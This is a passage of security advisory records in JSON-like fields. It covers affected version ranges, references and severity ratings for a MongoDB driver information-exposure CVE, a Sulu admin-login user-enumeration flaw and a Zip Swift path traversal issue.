[{'package': {'ecosystem': 'Packagist', 'name': 'mongodb/mongodb'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.9.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'mongodb'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.6.0'}, {'fixed': '3.6.10'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'mongodb'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.17.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'mongodb'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.8.0'}]}]}, {'package': {'ecosystem': 'purl-type:swift', 'name': 'https://github.com/mongodb/mongo-swift-driver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.1.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32050'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-php-driver/pull/1235'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-swift-driver/pull/643'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-php-driver/commit/4495de8313c0d313e4dde906fc7aedf998ee3748'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/node-mongodb-native/commit/8c8b4c3b8c55f10fb96f63d3bbfa5d408b4ed7d0'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/CDRIVER-3797'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/CXX-2028'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/NODE-3356'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/PHPC-1869'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/SWIFT-1229'}]
{'cwe_ids': ['CWE-200', 'CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-30T21:20:44Z', 'nvd_published_at': None}
1.4.0
GHSA-wmwf-49vv-p3mr
2023-08-04T13:31:19Z
2023-08-03T19:44:28Z
null
['CVE-2023-39343']
Sulu Observable Response Discrepancy on Admin Login
### Impact It allows over the Admin Login form to detect which user (username, email) exists and which one do not exist. Impacted by this issue are Sulu installation >= 2.5.0 and <2.5.10 using the newer Symfony Security System which is default since Symfony 6.0 but can be enabled in Symfony 5.4. Sulu Installation not using the old Symfony 5.4 security System and previous version are not impacted by this Security issue. ### Patches The problem has been patched in version 2.5.10. ### Workarounds Create a custom AuthenticationFailureHandler which does not return the `$exception->getMessage();` instead the `$exception->getMessageKey();` ### References Currently no references.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.10'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/sulu/sulu/security/advisories/GHSA-wmwf-49vv-p3mr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39343'}, {'type': 'WEB', 'url': 'https://github.com/sulu/sulu/commit/5f6c98ba030b2005793e2dc647cc938937ea889b'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/sulu/sulu/CVE-2023-39343.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/sulu/sulu'}, {'type': 'WEB', 'url': 'https://github.com/sulu/sulu/releases/tag/2.5.10'}]
{'cwe_ids': ['CWE-204'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T19:44:28Z', 'nvd_published_at': None}
1.4.0
GHSA-g454-wj9r-jpg4
2023-09-06T21:30:59Z
2023-08-31T00:30:17Z
null
['CVE-2023-39135']
Path traversal in Zip Swift
An issue in Zip Swift v2.1.2 allows attackers to execute a path traversal attack via a crafted zip entry.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'purl-type:swift', 'name': 'https://github.com/marmelroy/Zip'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39135'}, {'type': 'WEB', 'url': 'https://github.com/marmelroy/Zip/issues/245'}, {'type': 'WEB', 'url': 'https://blog.ostorlab.co/zip-packages-exploitation.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/marmelroy/Zip'}, {'type': 'WEB', 'url': 'https://ostorlab.co/vulndb/advisory/OVE-2023-1'}, {'type': 'WEB', 'url': 'https://security.snyk.io/research/zip-slip-vulnerability'}]
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-31T01:41:10Z', 'nvd_published_at': None}